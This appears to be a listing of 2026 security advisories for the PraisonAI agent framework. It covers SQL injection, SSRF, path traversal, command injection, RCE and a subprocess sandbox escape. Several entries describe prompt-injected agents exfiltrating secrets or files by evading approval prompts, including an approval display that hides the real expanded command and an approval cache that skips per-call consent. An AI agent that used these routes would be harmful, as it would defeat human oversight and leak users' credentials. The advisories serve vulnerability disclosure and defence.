Advisories for Pypi/Praisonaiagents package

2026

PraisonAI: SQL Injection via unvalidated `table_prefix` in 9 conversation store backends (incomplete fix for CVE-2026-40315)

The fix for CVE-2026-40315 added input validation to SQLiteConversationStore only. Nine sibling backends — MySQL, PostgreSQL, async SQLite/MySQL/PostgreSQL, Turso, SingleStore, Supabase, SurrealDB — pass table_prefix straight into f-string SQL. Same root cause, same code pattern, same exploitation. 52 unvalidated injection points across the codebase. postgres.py additionally accepts an unvalidated schema parameter used directly in DDL.

PraisonAI: SQL Injection via unvalidated `table_prefix` in 9 conversation store backends (incomplete fix for CVE-2026-40315)

The fix for CVE-2026-40315 added input validation to SQLiteConversationStore only. Nine sibling backends — MySQL, PostgreSQL, async SQLite/MySQL/PostgreSQL, Turso, SingleStore, Supabase, SurrealDB — pass table_prefix straight into f-string SQL. Same root cause, same code pattern, same exploitation. 52 unvalidated injection points across the codebase. postgres.py additionally accepts an unvalidated schema parameter used directly in DDL.

PraisonAIAgents: SSRF via unvalidated URL in `web_crawl` httpx fallback

web_crawl's httpx fallback path passes user-supplied URLs directly to httpx.AsyncClient.get() with follow_redirects=True and no host validation. An LLM agent tricked into crawling an internal URL can reach cloud metadata endpoints (169.254.169.254), internal services, and localhost. The response content is returned to the agent and may appear in output visible to the attacker. This fallback is the default crawl path on a fresh PraisonAI installation (no Tavily key, no Crawl4AI installed).

PraisonAIAgents: Path Traversal via Unvalidated Glob Pattern in list_files Bypasses Workspace Boundary

The list_files() tool in FileTools validates the directory parameter against workspace boundaries via _validate_path(), but passes the pattern parameter directly to Path.glob() without any validation. Since Python's Path.glob() supports .. path segments, an attacker can use relative path traversal in the glob pattern to enumerate arbitrary files outside the workspace, obtaining file metadata (existence, name, size, timestamps) for any path on the filesystem.

PraisonAIAgents: Environment Variable Secret Exfiltration via os.path.expandvars() Bypassing shell=False in Shell Tool

The execute_command function in shell_tools.py calls os.path.expandvars() on every command argument at line 64, manually re-implementing shell-level environment variable expansion despite using shell=False (line 88) for security. This allows exfiltration of secrets stored in environment variables (database credentials, API keys, cloud access keys). The approval system displays the unexpanded $VAR references to human reviewers, creating a deceptive approval where the displayed command differs from what actually executes.

PraisonAIAgents: Arbitrary File Read via read_skill_file Missing Workspace Boundary and Approval Gate

read_skill_file() in skill_tools.py allows reading arbitrary files from the filesystem by accepting an unrestricted skill_path parameter. Unlike file_tools.read_file which enforces workspace boundary confinement, and unlike run_skill_script which requires critical-level approval, read_skill_file has neither protection. An agent influenced by prompt injection can exfiltrate sensitive files without triggering any approval prompt.

PraisonAIAgents has SSRF and Local File Read via Unvalidated URLs in web_crawl Tool

The web_crawl() function in praisonaiagents/tools/web_crawl_tools.py accepts arbitrary URLs from AI agents with zero validation. No scheme allowlisting, hostname/IP blocklisting, or private network checks are applied before fetching. This allows an attacker (or prompt injection in crawled content) to force the agent to fetch cloud metadata endpoints, internal services, or local files via file:// URLs.

PraisonAIAgents has an OS Command Injection via shell=True in Memory Hooks Executor (memory/hooks.py)

Summary The memory hooks executor in praisonaiagents passes a user-controlled command string directly to subprocess.run() with shell=True at src/praisonai-agents/praisonaiagents/memory/hooks.py lines 303 to 305. No sanitization, no shlex.quote(), no character filter, and no allowlist check exists anywhere in this file. Shell metacharacters including semicolons, pipes, ampersands, backticks, dollar-sign substitutions, and newlines are interpreted by /bin/sh before the intended command executes. Two independent attack surfaces exist. The first is via pre_run_command and …

PraisonAI: Cross-Origin Agent Execution via Hardcoded Wildcard CORS and Missing Authentication on AGUI Endpoint

The AGUI endpoint (POST /agui) has no authentication and hardcodes Access-Control-Allow-Origin: * on all responses. Combined with Starlette/FastAPI's Content-Type-agnostic JSON parsing, any website a victim visits can silently trigger arbitrary agent execution against a locally-running AGUI server and read the full response, including tool execution results and potentially sensitive data from the victim's environment.

PraisonAI: Coarse-Grained Tool Approval Cache Bypasses Per-Invocation Consent for Shell Commands

The approval system in PraisonAI Agents caches tool approval decisions by tool name only, not by invocation arguments. Once a user approves execute_command for any command (e.g., ls -la), all subsequent execute_command calls in that execution context bypass the approval prompt entirely. Combined with os.environ.copy() passing all process environment variables to subprocesses, this allows an LLM agent (potentially via prompt injection) to silently exfiltrate API keys and credentials without further …

PraisonAI Vulnerable to RCE via Automatic tools.py Import

PraisonAI automatically imports ./tools.py from the current working directory when launching certain components. This includes call.py, tool_resolver.py, and CLI tool-loading paths. A malicious tools.py placed in the process working directory is executed immediately, allowing arbitrary Python code execution in the host environment.

PraisonAI has critical RCE via `type: job` workflow YAML

praisonai workflow run <file.yaml> loads untrusted YAML and if type: job executes steps through JobWorkflowExecutor in job_workflow.py. This supports: run: → shell command execution via subprocess.run() script: → inline Python execution via exec() python: → arbitrary Python script execution A malicious YAML file can execute arbitrary host commands.

PraisonAI has critical RCE via `type: job` workflow YAML

praisonai workflow run <file.yaml> loads untrusted YAML and if type: job executes steps through JobWorkflowExecutor in job_workflow.py. This supports: run: → shell command execution via subprocess.run() script: → inline Python execution via exec() python: → arbitrary Python script execution A malicious YAML file can execute arbitrary host commands.

PraisonAI Browser Server allows unauthenticated WebSocket clients to hijack connected extension sessions

praisonai browser start exposes the browser bridge on 0.0.0.0 by default, and its /ws endpoint accepts websocket clients that omit the Origin header entirely. An unauthenticated network client can connect as a fake controller, send start_session, cause the server to forward start_automation to another connected browser-extension websocket, and receive the resulting action/status stream back over that hijacked session. This allows unauthorized remote use of a connected browser automation session without …

PraisonAI Browser Server allows unauthenticated WebSocket clients to hijack connected extension sessions

praisonai browser start exposes the browser bridge on 0.0.0.0 by default, and its /ws endpoint accepts websocket clients that omit the Origin header entirely. An unauthenticated network client can connect as a fake controller, send start_session, cause the server to forward start_automation to another connected browser-extension websocket, and receive the resulting action/status stream back over that hijacked session. This allows unauthorized remote use of a connected browser automation session without …

PraisonAI has sandbox escape via exception frame traversal in `execute_code` (subprocess mode)

execute_code() in praisonaiagents.tools.python_tools defaults to sandbox_mode="sandbox", which runs user code in a subprocess wrapped with a restricted builtins dict and an AST-based blocklist. The AST blocklist embedded inside the subprocess wrapper (blocked_attrs, line 143 of python_tools.py) contains only 11 attribute names — a strict subset of the 30+ names blocked in the direct-execution path. The four attributes that form a frame-traversal chain out of the sandbox are all absent from …

PraisonAI has Memory State Leakage and Path Traversal in MultiAgent Context Handling

The MultiAgentLedger and MultiAgentMonitor components in the provided code exhibit vulnerabilities that can lead to context leakage and arbitrary file operations. Specifically: Memory State Leakage via Agent ID Collision: The MultiAgentLedger uses a dictionary to store ledgers by agent ID without enforcing uniqueness. This allows agents with the same ID to share ledger instances, leading to potential leakage of sensitive context data. Path Traversal in MultiAgentMonitor: The MultiAgentMonitor constructs file …